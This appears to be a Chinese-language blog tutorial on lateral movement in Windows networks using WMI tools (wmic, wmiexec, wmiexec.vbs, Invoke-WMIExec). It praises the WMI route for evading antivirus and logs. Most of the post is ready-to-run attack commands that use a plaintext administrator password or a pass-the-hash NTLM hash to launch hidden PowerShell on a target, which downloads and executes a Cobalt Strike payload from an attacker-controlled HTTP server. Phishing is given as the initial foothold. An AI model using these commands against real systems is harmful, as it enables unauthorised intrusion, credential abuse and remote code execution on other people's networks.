一.wmic
二.Wmiexec工具:
三.wmiexec.vbs工具
四.Invoke-WMIExec工具
WMI:
psexec被杀软禁用,WMI是一种新型的横向移动工具,本身的组织架构是数据库架构,在用WMI进行横向时,Windows操作系统不会将WMI的操作记录在日志中。
简单来说:wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode),WMI就是 WindowsManagement Instrumentation(Windows 管理规范)。它是 Windows 中的一个核心管理技术。
注意:
wmic命令需要本地管理员或域管理员才可以进行正常使用,普通权限用户若想要使用wmi,可以修改普通用户的ACL,不过修改用户的ACL管理员权也需要限,普通用户使用wmic。以下命令均在2008R2、2012R2、2016上进行测试,部分命令在虚拟机中测试不行。
一.wmic
利用:
先钓鱼上线目标机器
1、使用cs生成powershell脚本
2.wmic进行上线
我们将生成的脚本放在远程服务器上,开启http服务,确保能够远程下载
wmic /NODE:192.168.11.147 /user:administrator /password:Qq123456 PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))\""
3.成功上线:
二.Wmiexec工具:
wmiexec是一个即有全交互也有半交互的远程命令执行工具,有python版本的pe版本可运用于多种环 境,包括webshell环境、rdp环境、socks环境等
wmiexec.exe 域名/用户名:密码@目标IP #哈希传递获得shell
wmiexec.exe 域名/用户名:密码@目标IP "ipconfig" #执行命令
wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP #哈希传递获得shell
wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP "ipconfig" #执行命令
利用:
先上传工具
一.利用powershell明文上线:
wmiexec.exe administrator:[email protected] "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))
2.上线
二.使用hash上线:
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:05df2fd1109e3d3b60f110965f6af128 [email protected] "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))"
上线
三.wmiexec.vbs工具
wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。其可以在远程系统中执行命令并进行回显, 获取远程主机的半交互式Shell。wmiexec.vbs支持两种模式,一种是半交互式shell模式,另一种是执行 单条命令模式
使用powershell上线
cscript.exe //nologo wmiexec.vbs /cmd 192.168.11.147 administrator Qq123456 "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))"
成功上线
四.Invoke-WMIExec工具
1.用法如下
Invoke-WMIExec -Target IP -Domain 域 -Username 用户 -Hash hash-Command "calc.exe" -verbose
2.采用无文件落地的方式进行横向
shell powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.11.128:9988/Invoke-WMIExec.ps1');import-module .\Invoke-WMIExec.ps1;Invoke-WMIExec -Target 192.168.11.147 -Username administrator -Hash 05df2fd1109e3d3b60f110965f6af128 -Command "whoami" -verbose
执行成功
标签:exe,wmiexec,横向,192.168,WMI,wmic,powershell From: https://blog.csdn.net/2301_80116443/article/details/140774421